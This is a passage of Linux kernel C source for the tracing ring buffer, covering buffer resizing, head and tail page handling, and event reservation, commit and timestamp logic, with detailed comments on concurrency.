!cpumask_test_cpu(cpu_id, buffer->cpumask))
return size;
size = DIV_ROUND_UP(size, BUF_PAGE_SIZE);
size *= BUF_PAGE_SIZE;
/* we need a minimum of two pages */
if (size < BUF_PAGE_SIZE * 2)
size = BUF_PAGE_SIZE * 2;
nr_pages = DIV_ROUND_UP(size, BUF_PAGE_SIZE);
/*
* Don't succeed if resizing is disabled, as a reader might be
* manipulating the ring buffer and is expecting a sane state while
* this is true.
*/
if (atomic_read(&buffer->resize_disabled))
return -EBUSY;
/* prevent another thread from changing buffer sizes */
mutex_lock(&buffer->mutex);
if (cpu_id == RING_BUFFER_ALL_CPUS) {
/* calculate the pages to update */
for_each_buffer_cpu(buffer, cpu) {
cpu_buffer = buffer->buffers[cpu];
cpu_buffer->nr_pages_to_update = nr_pages -
cpu_buffer->nr_pages;
/*
* nothing more to do for removing pages or no update
*/
if (cpu_buffer->nr_pages_to_update <= 0)
continue;
/*
* to add pages, make sure all new pages can be
* allocated without receiving ENOMEM
*/
INIT_LIST_HEAD(&cpu_buffer->new_pages);
if (__rb_allocate_pages(cpu_buffer->nr_pages_to_update,
&cpu_buffer->new_pages, cpu)) {
/* not enough memory for new pages */
err = -ENOMEM;
goto out_err;
}
}
get_online_cpus();
/*
* Fire off all the required work handlers
* We can't schedule on offline CPUs, but it's not necessary
* since we can change their buffer sizes without any race.
*/
for_each_buffer_cpu(buffer, cpu) {
cpu_buffer = buffer->buffers[cpu];
if (!cpu_buffer->nr_pages_to_update)
continue;
/* Can't run something on an offline CPU. */
if (!cpu_online(cpu)) {
rb_update_pages(cpu_buffer);
cpu_buffer->nr_pages_to_update = 0;
} else {
schedule_work_on(cpu,
&cpu_buffer->update_pages_work);
}
}
/* wait for all the updates to complete */
for_each_buffer_cpu(buffer, cpu) {
cpu_buffer = buffer->buffers[cpu];
if (!cpu_buffer->nr_pages_to_update)
continue;
if (cpu_online(cpu))
wait_for_completion(&cpu_buffer->update_done);
cpu_buffer->nr_pages_to_update = 0;
}
put_online_cpus();
} else {
		/* Make sure this CPU has been initialized */
if (!cpumask_test_cpu(cpu_id, buffer->cpumask))
goto out;
cpu_buffer = buffer->buffers[cpu_id];
if (nr_pages == cpu_buffer->nr_pages)
goto out;
cpu_buffer->nr_pages_to_update = nr_pages -
cpu_buffer->nr_pages;
INIT_LIST_HEAD(&cpu_buffer->new_pages);
if (cpu_buffer->nr_pages_to_update > 0 &&
__rb_allocate_pages(cpu_buffer->nr_pages_to_update,
&cpu_buffer->new_pages, cpu_id)) {
err = -ENOMEM;
goto out_err;
}
get_online_cpus();
/* Can't run something on an offline CPU. */
if (!cpu_online(cpu_id))
rb_update_pages(cpu_buffer);
else {
schedule_work_on(cpu_id,
&cpu_buffer->update_pages_work);
wait_for_completion(&cpu_buffer->update_done);
}
cpu_buffer->nr_pages_to_update = 0;
put_online_cpus();
}
out:
/*
* The ring buffer resize can happen with the ring buffer
* enabled, so that the update disturbs the tracing as little
* as possible. But if the buffer is disabled, we do not need
* to worry about that, and we can take the time to verify
* that the buffer is not corrupt.
*/
if (atomic_read(&buffer->record_disabled)) {
atomic_inc(&buffer->record_disabled);
/*
* Even though the buffer was disabled, we must make sure
* that it is truly disabled before calling rb_check_pages.
* There could have been a race between checking
* record_disable and incrementing it.
*/
synchronize_sched();
for_each_buffer_cpu(buffer, cpu) {
cpu_buffer = buffer->buffers[cpu];
rb_check_pages(cpu_buffer);
}
atomic_dec(&buffer->record_disabled);
}
mutex_unlock(&buffer->mutex);
return size;
out_err:
for_each_buffer_cpu(buffer, cpu) {
struct buffer_page *bpage, *tmp;
cpu_buffer = buffer->buffers[cpu];
cpu_buffer->nr_pages_to_update = 0;
if (list_empty(&cpu_buffer->new_pages))
continue;
list_for_each_entry_safe(bpage, tmp, &cpu_buffer->new_pages,
list) {
list_del_init(&bpage->list);
free_buffer_page(bpage);
}
}
mutex_unlock(&buffer->mutex);
return err;
}
EXPORT_SYMBOL_GPL(ring_buffer_resize);
void ring_buffer_change_overwrite(struct ring_buffer *buffer, int val)
{
mutex_lock(&buffer->mutex);
if (val)
buffer->flags |= RB_FL_OVERWRITE;
else
buffer->flags &= ~RB_FL_OVERWRITE;
mutex_unlock(&buffer->mutex);
}
EXPORT_SYMBOL_GPL(ring_buffer_change_overwrite);
static inline void *
__rb_data_page_index(struct buffer_data_page *bpage, unsigned index)
{
return bpage->data + index;
}
static inline void *__rb_page_index(struct buffer_page *bpage, unsigned index)
{
return bpage->page->data + index;
}
static inline struct ring_buffer_event *
rb_reader_event(struct ring_buffer_per_cpu *cpu_buffer)
{
return __rb_page_index(cpu_buffer->reader_page,
cpu_buffer->reader_page->read);
}
static inline struct ring_buffer_event *
rb_iter_head_event(struct ring_buffer_iter *iter)
{
return __rb_page_index(iter->head_page, iter->head);
}
static inline unsigned rb_page_commit(struct buffer_page *bpage)
{
return local_read(&bpage->page->commit);
}
/* Size is determined by what has been committed */
static inline unsigned rb_page_size(struct buffer_page *bpage)
{
return rb_page_commit(bpage);
}
static inline unsigned
rb_commit_index(struct ring_buffer_per_cpu *cpu_buffer)
{
return rb_page_commit(cpu_buffer->commit_page);
}
static inline unsigned
rb_event_index(struct ring_buffer_event *event)
{
unsigned long addr = (unsigned long)event;
return (addr & ~PAGE_MASK) - BUF_PAGE_HDR_SIZE;
}
static void rb_inc_iter(struct ring_buffer_iter *iter)
{
struct ring_buffer_per_cpu *cpu_buffer = iter->cpu_buffer;
/*
* The iterator could be on the reader page (it starts there).
* But the head could have moved, since the reader was
* found. Check for this case and assign the iterator
* to the head page instead of next.
*/
if (iter->head_page == cpu_buffer->reader_page)
iter->head_page = rb_set_head_page(cpu_buffer);
else
rb_inc_page(cpu_buffer, &iter->head_page);
iter->read_stamp = iter->head_page->page->time_stamp;
iter->head = 0;
}
/*
* rb_handle_head_page - writer hit the head page
*
* Returns: +1 to retry page
* 0 to continue
* -1 on error
*/
static int
rb_handle_head_page(struct ring_buffer_per_cpu *cpu_buffer,
struct buffer_page *tail_page,
struct buffer_page *next_page)
{
struct buffer_page *new_head;
int entries;
int type;
int ret;
entries = rb_page_entries(next_page);
/*
* The hard part is here. We need to move the head
* forward, and protect against both readers on
* other CPUs and writers coming in via interrupts.
*/
type = rb_head_page_set_update(cpu_buffer, next_page, tail_page,
RB_PAGE_HEAD);
/*
* type can be one of four:
* NORMAL - an interrupt already moved it for us
* HEAD - we are the first to get here.
* UPDATE - we are the interrupt interrupting
* a current move.
* MOVED - a reader on another CPU moved the next
* pointer to its reader page. Give up
* and try again.
*/
switch (type) {
case RB_PAGE_HEAD:
/*
* We changed the head to UPDATE, thus
* it is our responsibility to update
* the counters.
*/
local_add(entries, &cpu_buffer->overrun);
local_sub(BUF_PAGE_SIZE, &cpu_buffer->entries_bytes);
/*
* The entries will be zeroed out when we move the
* tail page.
*/
/* still more to do */
break;
case RB_PAGE_UPDATE:
/*
		 * This is an interrupt that interrupted the
* previous update. Still more to do.
*/
break;
case RB_PAGE_NORMAL:
/*
* An interrupt came in before the update
* and processed this for us.
* Nothing left to do.
*/
return 1;
case RB_PAGE_MOVED:
/*
* The reader is on another CPU and just did
* a swap with our next_page.
* Try again.
*/
return 1;
default:
RB_WARN_ON(cpu_buffer, 1); /* WTF??? */
return -1;
}
/*
* Now that we are here, the old head pointer is
* set to UPDATE. This will keep the reader from
* swapping the head page with the reader page.
* The reader (on another CPU) will spin till
* we are finished.
*
* We just need to protect against interrupts
* doing the job. We will set the next pointer
* to HEAD. After that, we set the old pointer
* to NORMAL, but only if it was HEAD before.
* otherwise we are an interrupt, and only
* want the outer most commit to reset it.
*/
new_head = next_page;
rb_inc_page(cpu_buffer, &new_head);
ret = rb_head_page_set_head(cpu_buffer, new_head, next_page,
RB_PAGE_NORMAL);
/*
* Valid returns are:
* HEAD - an interrupt came in and already set it.
* NORMAL - One of two things:
* 1) We really set it.
* 2) A bunch of interrupts came in and moved
* the page forward again.
*/
switch (ret) {
case RB_PAGE_HEAD:
case RB_PAGE_NORMAL:
/* OK */
break;
default:
RB_WARN_ON(cpu_buffer, 1);
return -1;
}
/*
* It is possible that an interrupt came in,
* set the head up, then more interrupts came in
* and moved it again. When we get back here,
* the page would have been set to NORMAL but we
* just set it back to HEAD.
*
* How do you detect this? Well, if that happened
* the tail page would have moved.
*/
if (ret == RB_PAGE_NORMAL) {
struct buffer_page *buffer_tail_page;
buffer_tail_page = READ_ONCE(cpu_buffer->tail_page);
/*
		 * If the tail had moved past next, then we need
* to reset the pointer.
*/
if (buffer_tail_page != tail_page &&
buffer_tail_page != next_page)
rb_head_page_set_normal(cpu_buffer, new_head,
next_page,
RB_PAGE_HEAD);
}
/*
* If this was the outer most commit (the one that
* changed the original pointer from HEAD to UPDATE),
* then it is up to us to reset it to NORMAL.
*/
if (type == RB_PAGE_HEAD) {
ret = rb_head_page_set_normal(cpu_buffer, next_page,
tail_page,
RB_PAGE_UPDATE);
if (RB_WARN_ON(cpu_buffer,
ret != RB_PAGE_UPDATE))
return -1;
}
return 0;
}
static inline void
rb_reset_tail(struct ring_buffer_per_cpu *cpu_buffer,
unsigned long tail, struct rb_event_info *info)
{
struct buffer_page *tail_page = info->tail_page;
struct ring_buffer_event *event;
unsigned long length = info->length;
/*
* Only the event that crossed the page boundary
* must fill the old tail_page with padding.
*/
if (tail >= BUF_PAGE_SIZE) {
/*
* If the page was filled, then we still need
* to update the real_end. Reset it to zero
* and the reader will ignore it.
*/
if (tail == BUF_PAGE_SIZE)
tail_page->real_end = 0;
local_sub(length, &tail_page->write);
return;
}
event = __rb_page_index(tail_page, tail);
kmemcheck_annotate_bitfield(event, bitfield);
/* account for padding bytes */
local_add(BUF_PAGE_SIZE - tail, &cpu_buffer->entries_bytes);
/*
* Save the original length to the meta data.
* This will be used by the reader to add lost event
* counter.
*/
tail_page->real_end = tail;
/*
* If this event is bigger than the minimum size, then
* we need to be careful that we don't subtract the
* write counter enough to allow another writer to slip
* in on this page.
* We put in a discarded commit instead, to make sure
* that this space is not used again.
*
* If we are less than the minimum size, we don't need to
* worry about it.
*/
if (tail > (BUF_PAGE_SIZE - RB_EVNT_MIN_SIZE)) {
/* No room for any events */
/* Mark the rest of the page with padding */
rb_event_set_padding(event);
/* Set the write back to the previous setting */
local_sub(length, &tail_page->write);
return;
}
/* Put in a discarded event */
event->array[0] = (BUF_PAGE_SIZE - tail) - RB_EVNT_HDR_SIZE;
event->type_len = RINGBUF_TYPE_PADDING;
/* time delta must be non zero */
event->time_delta = 1;
/* Set write to end of buffer */
length = (tail + length) - BUF_PAGE_SIZE;
local_sub(length, &tail_page->write);
}
static inline void rb_end_commit(struct ring_buffer_per_cpu *cpu_buffer);
/*
* This is the slow path, force gcc not to inline it.
*/
static noinline struct ring_buffer_event *
rb_move_tail(struct ring_buffer_per_cpu *cpu_buffer,
unsigned long tail, struct rb_event_info *info)
{
struct buffer_page *tail_page = info->tail_page;
struct buffer_page *commit_page = cpu_buffer->commit_page;
struct ring_buffer *buffer = cpu_buffer->buffer;
struct buffer_page *next_page;
int ret;
next_page = tail_page;
rb_inc_page(cpu_buffer, &next_page);
/*
* If for some reason, we had an interrupt storm that made
* it all the way around the buffer, bail, and warn
* about it.
*/
if (unlikely(next_page == commit_page)) {
local_inc(&cpu_buffer->commit_overrun);
goto out_reset;
}
/*
* This is where the fun begins!
*
* We are fighting against races between a reader that
* could be on another CPU trying to swap its reader
* page with the buffer head.
*
* We are also fighting against interrupts coming in and
* moving the head or tail on us as well.
*
* If the next page is the head page then we have filled
* the buffer, unless the commit page is still on the
* reader page.
*/
if (rb_is_head_page(cpu_buffer, next_page, &tail_page->list)) {
/*
* If the commit is not on the reader page, then
* move the header page.
*/
if (!rb_is_reader_page(cpu_buffer->commit_page)) {
/*
* If we are not in overwrite mode,
* this is easy, just stop here.
*/
if (!(buffer->flags & RB_FL_OVERWRITE)) {
local_inc(&cpu_buffer->dropped_events);
goto out_reset;
}
ret = rb_handle_head_page(cpu_buffer,
tail_page,
next_page);
if (ret < 0)
goto out_reset;
if (ret)
goto out_again;
} else {
/*
* We need to be careful here too. The
* commit page could still be on the reader
* page. We could have a small buffer, and
* have filled up the buffer with events
* from interrupts and such, and wrapped.
*
 * Note, if the tail page is also on the
* reader_page, we let it move out.
*/
if (unlikely((cpu_buffer->commit_page !=
cpu_buffer->tail_page) &&
(cpu_buffer->commit_page ==
cpu_buffer->reader_page))) {
local_inc(&cpu_buffer->commit_overrun);
goto out_reset;
}
}
}
rb_tail_page_update(cpu_buffer, tail_page, next_page);
out_again:
rb_reset_tail(cpu_buffer, tail, info);
/* Commit what we have for now. */
rb_end_commit(cpu_buffer);
/* rb_end_commit() decs committing */
local_inc(&cpu_buffer->committing);
/* fail and let the caller try again */
return ERR_PTR(-EAGAIN);
out_reset:
/* reset write */
rb_reset_tail(cpu_buffer, tail, info);
return NULL;
}
/* Slow path, do not inline */
static noinline struct ring_buffer_event *
rb_add_time_stamp(struct ring_buffer_event *event, u64 delta)
{
event->type_len = RINGBUF_TYPE_TIME_EXTEND;
/* Not the first event on the page? */
if (rb_event_index(event)) {
event->time_delta = delta & TS_MASK;
event->array[0] = delta >> TS_SHIFT;
} else {
/* nope, just zero it */
event->time_delta = 0;
event->array[0] = 0;
}
return skip_time_extend(event);
}
static inline bool rb_event_is_commit(struct ring_buffer_per_cpu *cpu_buffer,
struct ring_buffer_event *event);
/**
* rb_update_event - update event type and data
* @event: the event to update
* @type: the type of event
* @length: the size of the event field in the ring buffer
*
* Update the type and data fields of the event. The length
* is the actual size that is written to the ring buffer,
* and with this, we can determine what to place into the
* data field.
*/
static void
rb_update_event(struct ring_buffer_per_cpu *cpu_buffer,
struct ring_buffer_event *event,
struct rb_event_info *info)
{
unsigned length = info->length;
u64 delta = info->delta;
/* Only a commit updates the timestamp */
if (unlikely(!rb_event_is_commit(cpu_buffer, event)))
delta = 0;
/*
* If we need to add a timestamp, then we
 * add it to the start of the reserved space.
*/
if (unlikely(info->add_timestamp)) {
event = rb_add_time_stamp(event, delta);
length -= RB_LEN_TIME_EXTEND;
delta = 0;
}
event->time_delta = delta;
length -= RB_EVNT_HDR_SIZE;
if (length > RB_MAX_SMALL_DATA || RB_FORCE_8BYTE_ALIGNMENT) {
event->type_len = 0;
event->array[0] = length;
} else
event->type_len = DIV_ROUND_UP(length, RB_ALIGNMENT);
}
static unsigned rb_calculate_event_length(unsigned length)
{
struct ring_buffer_event event; /* Used only for sizeof array */
/* zero length can cause confusions */
if (!length)
length++;
if (length > RB_MAX_SMALL_DATA || RB_FORCE_8BYTE_ALIGNMENT)
length += sizeof(event.array[0]);
length += RB_EVNT_HDR_SIZE;
length = ALIGN(length, RB_ARCH_ALIGNMENT);
/*
* In case the time delta is larger than the 27 bits for it
* in the header, we need to add a timestamp. If another
* event comes in when trying to discard this one to increase
* the length, then the timestamp will be added in the allocated
* space of this event. If length is bigger than the size needed
* for the TIME_EXTEND, then padding has to be used. The events
* length must be either RB_LEN_TIME_EXTEND, or greater than or equal
* to RB_LEN_TIME_EXTEND + 8, as 8 is the minimum size for padding.
* As length is a multiple of 4, we only need to worry if it
* is 12 (RB_LEN_TIME_EXTEND + 4).
*/
if (length == RB_LEN_TIME_EXTEND + RB_ALIGNMENT)
length += RB_ALIGNMENT;
return length;
}
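/*
 * Worked example (a sketch only, assuming a 4-byte event header, 4-byte
 * alignment and no forced 8-byte alignment): a requested length of 6
 * becomes 6 + 4 = 10, aligned up to 12, which equals
 * RB_LEN_TIME_EXTEND + RB_ALIGNMENT and is therefore bumped to 16, so
 * a discarded event of this size can always be turned into padding.
 */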
#ifndef CONFIG_HAVE_UNSTABLE_SCHED_CLOCK
static inline bool sched_clock_stable(void)
{
return true;
}
#endif
static inline int
rb_try_to_discard(struct ring_buffer_per_cpu *cpu_buffer,
struct ring_buffer_event *event)
{
unsigned long new_index, old_index;
struct buffer_page *bpage;
unsigned long index;
unsigned long addr;
new_index = rb_event_index(event);
old_index = new_index + rb_event_ts_length(event);
addr = (unsigned long)event;
addr &= PAGE_MASK;
bpage = READ_ONCE(cpu_buffer->tail_page);
if (bpage->page == (void *)addr && rb_page_write(bpage) == old_index) {
unsigned long write_mask =
local_read(&bpage->write) & ~RB_WRITE_MASK;
unsigned long event_length = rb_event_length(event);
/*
* This is on the tail page. It is possible that
* a write could come in and move the tail page
* and write to the next page. That is fine
* because we just shorten what is on this page.
*/
old_index += write_mask;
new_index += write_mask;
index = local_cmpxchg(&bpage->write, old_index, new_index);
if (index == old_index) {
/* update counters */
local_sub(event_length, &cpu_buffer->entries_bytes);
return 1;
}
}
/* could not discard */
return 0;
}
static void rb_start_commit(struct ring_buffer_per_cpu *cpu_buffer)
{
local_inc(&cpu_buffer->committing);
local_inc(&cpu_buffer->commits);
}
static void
rb_set_commit_to_write(struct ring_buffer_per_cpu *cpu_buffer)
{
unsigned long max_count;
/*
* We only race with interrupts and NMIs on this CPU.
* If we own the commit event, then we can commit
* all others that interrupted us, since the interruptions
* are in stack format (they finish before they come
* back to us). This allows us to do a simple loop to
* assign the commit to the tail.
*/
again:
max_count = cpu_buffer->nr_pages * 100;
while (cpu_buffer->commit_page != READ_ONCE(cpu_buffer->tail_page)) {
if (RB_WARN_ON(cpu_buffer, !(--max_count)))
return;
if (RB_WARN_ON(cpu_buffer,
rb_is_reader_page(cpu_buffer->tail_page)))
return;
local_set(&cpu_buffer->commit_page->page->commit,
rb_page_write(cpu_buffer->commit_page));
rb_inc_page(cpu_buffer, &cpu_buffer->commit_page);
/* Only update the write stamp if the page has an event */
if (rb_page_write(cpu_buffer->commit_page))
cpu_buffer->write_stamp =
cpu_buffer->commit_page->page->time_stamp;
/* add barrier to keep gcc from optimizing too much */
barrier();
}
while (rb_commit_index(cpu_buffer) !=
rb_page_write(cpu_buffer->commit_page)) {
local_set(&cpu_buffer->commit_page->page->commit,
rb_page_write(cpu_buffer->commit_page));
RB_WARN_ON(cpu_buffer,
local_read(&cpu_buffer->commit_page->page->commit) &
~RB_WRITE_MASK);
barrier();
}
/* again, keep gcc from optimizing */
barrier();
/*
* If an interrupt came in just after the first while loop
* and pushed the tail page forward, we will be left with
* a dangling commit that will never go forward.
*/
if (unlikely(cpu_buffer->commit_page != READ_ONCE(cpu_buffer->tail_page)))
goto again;
}
static inline void rb_end_commit(struct ring_buffer_per_cpu *cpu_buffer)
{
unsigned long commits;
if (RB_WARN_ON(cpu_buffer,
!local_read(&cpu_buffer->committing)))
return;
again:
commits = local_read(&cpu_buffer->commits);
/* synchronize with interrupts */
barrier();
if (local_read(&cpu_buffer->committing) == 1)
rb_set_commit_to_write(cpu_buffer);
local_dec(&cpu_buffer->committing);
/* synchronize with interrupts */
barrier();
/*
* Need to account for interrupts coming in between the
* updating of the commit page and the clearing of the
* committing counter.
*/
if (unlikely(local_read(&cpu_buffer->commits) != commits) &&
!local_read(&cpu_buffer->committing)) {
local_inc(&cpu_buffer->committing);
goto again;
}
}
static inline void rb_event_discard(struct ring_buffer_event *event)
{
if (event->type_len == RINGBUF_TYPE_TIME_EXTEND)
event = skip_time_extend(event);
/* array[0] holds the actual length for the discarded event */
event->array[0] = rb_event_data_length(event) - RB_EVNT_HDR_SIZE;
event->type_len = RINGBUF_TYPE_PADDING;
/* time delta must be non zero */
if (!event->time_delta)
event->time_delta = 1;
}
static inline bool
rb_event_is_commit(struct ring_buffer_per_cpu *cpu_buffer,
struct ring_buffer_event *event)
{
unsigned long addr = (unsigned long)event;
unsigned long index;
index = rb_event_index(event);
addr &= PAGE_MASK;
return cpu_buffer->commit_page->page == (void *)addr &&
rb_commit_index(cpu_buffer) == index;
}
static void
rb_update_write_stamp(struct ring_buffer_per_cpu *cpu_buffer,
struct ring_buffer_event *event)
{
u64 delta;
/*
* The event first in the commit queue updates the
* time stamp.
*/
if (rb_event_is_commit(cpu_buffer, event)) {
/*
* A commit event that is first on a page
* updates the write timestamp with the page stamp
*/
if (!rb_event_index(event))
cpu_buffer->write_stamp =
cpu_buffer->commit_page->page->time_stamp;
else if (event->type_len == RINGBUF_TYPE_TIME_EXTEND) {
delta = event->array[0];
delta <<= TS_SHIFT;
delta += event->time_delta;
cpu_buffer->write_stamp += delta;
} else
cpu_buffer->write_stamp += event->time_delta;
}
}
static void rb_commit(struct ring_buffer_per_cpu *cpu_buffer,
struct ring_buffer_event *event)
{
local_inc(&cpu_buffer->entries);
rb_update_write_stamp(cpu_buffer, event);
rb_end_commit(cpu_buffer);
}
static __always_inline void
rb_wakeups(struct ring_buffer *buffer, struct ring_buffer_per_cpu *cpu_buffer)
{
bool pagebusy;
if (buffer->irq_work.waiters_pending) {
buffer->irq_work.waiters_pending = false;
/* irq_work_queue() supplies its own memory barriers */
irq_work_queue(&buffer->irq_work.work);
}
if (cpu_buffer->irq_work.waiters_pending) {
cpu_buffer->irq_work.waiters_pending = false;
/* irq_work_queue() supplies its own memory barriers */
irq_work_queue(&cpu_buffer->irq_work.work);
}
pagebusy = cpu_buffer->reader_page == cpu_buffer->commit_page;
if (!pagebusy && cpu_buffer->irq_work.full_waiters_pending) {
cpu_buffer->irq_work.wakeup_full = true;
cpu_buffer->irq_work.full_waiters_pending = false;
/* irq_work_queue() supplies its own memory barriers */
irq_work_queue(&cpu_buffer->irq_work.work);
}
}
/*
* The lock and unlock are done within a preempt disable section.
* The current_context per_cpu variable can only be modified
* by the current task between lock and unlock. But it can
* be modified more than once via an interrupt. To pass this
* information from the lock to the unlock without having to
* access the 'in_interrupt()' functions again (which do show
 * a bit of overhead in something as critical as function tracing),
* we use a bitmask trick.
*
* bit 0 = NMI context
* bit 1 = IRQ context
* bit 2 = SoftIRQ context
* bit 3 = normal context.
*
* This works because this is the order of contexts that can
* preempt other contexts. A SoftIRQ never preempts an IRQ
* context.
*
* When the context is determined, the corresponding bit is
* checked and set (if it was set, then a recursion of that context
* happened).
*
* On unlock, we need to clear this bit. To do so, just subtract
* 1 from the current_context and AND it to itself.
*
* (binary)
* 101 - 1 = 100
* 101 & 100 = 100 (clearing bit zero)
*
* 1010 - 1 = 1001
* 1010 & 1001 = 1000 (clearing bit 1)
*
* The least significant bit can be cleared this way, and it
* just so happens that it is the same bit corresponding to
* the current context.
*/
static __always_inline int
trace_recursive_lock(struct ring_buffer_per_cpu *cpu_buffer)
{
unsigned int val = cpu_buffer->current_context;
int bit;
if (in_interrupt()) {
if (in_nmi())
bit = RB_CTX_NMI;
else if (in_irq())
bit = RB_CTX_IRQ;
else
bit = RB_CTX_SOFTIRQ;
} else
bit = RB_CTX_NORMAL;
if (unlikely(val & (1 << bit)))
return 1;
val |= (1 << bit);
cpu_buffer->current_context = val;
return 0;
}
static __always_inline void
trace_recursive_unlock(struct ring_buffer_per_cpu *cpu_buffer)
{
cpu_buffer->current_context &= cpu_buffer->current_context - 1;
}
/**
 * ring_buffer_unlock_commit - commit a reserved event
* @buffer: The buffer to commit to
* @event: The event pointer to commit.
*
* This commits the data to the ring buffer, and releases any locks held.
*
* Must be paired with ring_buffer_lock_reserve.
*/
int ring_buffer_unlock_commit(struct ring_buffer *buffer,
struct ring_buffer_event *event)
{
struct ring_buffer_per_cpu *cpu_buffer;
int cpu = raw_smp_processor_id();
cpu_buffer = buffer->buffers[cpu];
rb_commit(cpu_buffer, event);
rb_wakeups(buffer, cpu_buffer);
trace_recursive_unlock(cpu_buffer);
preempt_enable_notrace();
return 0;
}
EXPORT_SYMBOL_GPL(ring_buffer_unlock_commit);
static noinline void
rb_handle_timestamp(struct ring_buffer_per_cpu *cpu_buffer,
struct rb_event_info *info)
{
WARN_ONCE(info->delta > (1ULL << 59),
KERN_WARNING "Delta way too big! %llu ts=%llu write stamp = %llu\n%s",
(unsigned long long)info->delta,
(unsigned long long)info->ts,
(unsigned long long)cpu_buffer->write_stamp,
sched_clock_stable() ? "" :
"If you just came from a suspend/resume,\n"
"please switch to the trace global clock:\n"
" echo global > /sys/kernel/debug/tracing/trace_clock\n");
info->add_timestamp = 1;
}
static struct ring_buffer_event *
__rb_reserve_next(struct ring_buffer_per_cpu *cpu_buffer,
struct rb_event_info *info)
{
struct ring_buffer_event *event;
struct buffer_page *tail_page;
unsigned long tail, write;
/*
* If the time delta since the last event is too big to
* hold in the time field of the event, then we append a
* TIME EXTEND event ahead of the data event.
*/
if (unlikely(info->add_timestamp))
info->length += RB_LEN_TIME_EXTEND;
/* Don't let the compiler play games with cpu_buffer->tail_page */
tail_page = info->tail_page = READ_ONCE(cpu_buffer->tail_page);
write = local_add_return(info->length, &tail_page->write);
/* set write to only the index of the write */
write &= RB_WRITE_MASK;
tail = write - info->length;
/*
* If this is the first commit on the page, then it has the same
* timestamp as the page itself.
*/
if (!tail)
info->delta = 0;
/* See if we shot past the end of this buffer page */
if (unlikely(write > BUF_PAGE_SIZE))
return rb_move_tail(cpu_buffer, tail, info);
/* We reserved something on the buffer */
event = __rb_page_index(tail_page, tail);
kmemcheck_annotate_bitfield(event, bitfield);
rb_update_event(cpu_buffer, event, info);
local_inc(&tail_page->entries);
/*
* If this is the first commit on the page, then update
* its timestamp.
*/
if (!tail)
tail_page->page->time_stamp = info->ts;
/* account for these added bytes */
local_add(info->length, &cpu_buffer->entries_bytes);
return event;
}
static struct ring_buffer_event *
rb_reserve_next_event(struct ring_buffer *buffer,
struct ring_buffer_per_cpu *cpu_buffer,
unsigned long length)
{
struct ring_buffer_event *event;
struct rb_event_info info;
int nr_loops = 0;
u64 diff;
rb_start_commit(cpu_buffer);
#ifdef CONFIG_RING_BUFFER_ALLOW_SWAP
/*
* Due to the ability to swap a cpu buffer from a buffer
* it is possible it was swapped before we committed.
* (committing stops a swap). We check for it here and
* if it happened, we have to fail the write.
*/
barrier();
if (unlikely(ACCESS_ONCE(cpu_buffer->buffer) != buffer)) {
local_dec(&cpu_buffer->committing);
local_dec(&cpu_buffer->commits);
return NULL;
}
#endif
info.length = rb_calculate_event_length(length);
again:
info.add_timestamp = 0;
info.delta = 0;
/*
* We allow for interrupts to reenter here and do a trace.
* If one does, it will cause this original code to loop
* back here. Even with heavy interrupts happening, this
* should only happen a few times in a row. If this happens
* 1000 times in a row, there must be either an interrupt
* storm or we have something buggy.
* Bail!
*/
if (RB_WARN_ON(cpu_buffer, ++nr_loops > 1000))
goto out_fail;
info.ts = rb_time_stamp(cpu_buffer->buffer);
diff = info.ts - cpu_buffer->write_stamp;
/* make sure this diff is calculated here */
barrier();
/* Did the write stamp get updated already? */
if (likely(info.ts >= cpu_buffer->write_stamp)) {
info.delta = diff;
if (unlikely(test_time_stamp(info.delta)))
rb_handle_timestamp(cpu_buffer, &info);
}
event = __rb_reserve_next(cpu_buffer, &info);
if (unlikely(PTR_ERR(event) == -EAGAIN)) {
if (info.add_timestamp)
info.length -= RB_LEN_TIME_EXTEND;
goto again;
}
if (!event)
goto out_fail;
return event;
out_fail:
rb_end_commit(cpu_buffer);
return NULL;
}
/**
* ring_buffer_lock_reserve - reserve a part of the buffer
* @buffer: the ring buffer to reserve from
* @length: the length of the data to reserve (excluding event header)
*
 * Returns a reserved event on the ring buffer to copy directly to.
* The user of this interface will need to get the body to write into
* and can use the ring_buffer_event_data() interface.
*
* The length is the length of the data needed, not the event length
* which also includes the event header.
*
* Must be paired with ring_buffer_unlock_commit, unless NULL is returned.
* If NULL is returned, then nothing has been allocated or locked.
*/
struct ring_buffer_event *
ring_buffer_lock_reserve(struct ring_buffer *buffer, unsigned long length)
{
struct ring_buffer_per_cpu *cpu_buffer;
struct ring_buffer_event *event;
int cpu;
/* If we are tracing schedule, we don't want to recurse */
preempt_disable_notrace();
if (unlikely(atomic_read(&buffer->record_disabled)))
goto out;
cpu = raw_smp_processor_id();
if (unlikely(!cpumask_test_cpu(cpu, buffer->cpumask)))
goto out;
cpu_buffer = buffer->buffers[cpu];
if (unlikely(atomic_read(&cpu_buffer->record_disabled)))
goto out;
if (unlikely(length > BUF_MAX_DATA_SIZE))
goto out;
if (unlikely(trace_recursive_lock(cpu_buffer)))
goto out;
event = rb_reserve_next_event(buffer, cpu_buffer, length);
if (!event)
goto out_unlock;
return event;
out_unlock:
trace_recursive_unlock(cpu_buffer);
out:
preempt_enable_notrace();
return NULL;
}
EXPORT_SYMBOL_GPL(ring_buffer_lock_reserve);
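/*
 * Usage sketch (illustrative only; error handling is elided and
 * "struct my_entry" is a hypothetical payload type, not part of this
 * file):
 *
 *	struct ring_buffer_event *event;
 *	struct my_entry *entry;
 *
 *	event = ring_buffer_lock_reserve(buffer, sizeof(*entry));
 *	if (event) {
 *		entry = ring_buffer_event_data(event);
 *		entry->value = 42;
 *		ring_buffer_unlock_commit(buffer, event);
 *	}
 *
 * If NULL was returned nothing was reserved, so neither a commit nor
 * a discard may be issued.
 */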
/*
* Decrement the entries to the page that an event is on.
* The event does not even need to exist, only the pointer
* to the page it is on. This may only be called before the commit
* takes place.
*/
static inline void
rb_decrement_entry(struct ring_buffer_per_cpu *cpu_buffer,
struct ring_buffer_event *event)
{
unsigned long addr = (unsigned long)event;
struct buffer_page *bpage = cpu_buffer->commit_page;
struct buffer_page *start;
addr &= PAGE_MASK;
/* Do the likely case first */
if (likely(bpage->page == (void *)addr)) {
local_dec(&bpage->entries);
return;
}
/*
* Because the commit page may be on the reader page we
* start with the next page and check the end loop there.
*/
rb_inc_page(cpu_buffer, &bpage);
start = bpage;
do {
if (bpage->page == (void *)addr) {
local_dec(&bpage->entries);
return;
}
rb_inc_page(cpu_buffer, &bpage);
} while (bpage != start);
/* commit not part of this buffer?? */
RB_WARN_ON(cpu_buffer, 1);
}
/**
* ring_buffer_commit_discard - discard an event that has not been committed
* @buffer: the ring buffer
* @event: non committed event to discard
*
* Sometimes an event that is in the ring buffer needs to be ignored.
* This function lets the user discard an event in the ring buffer
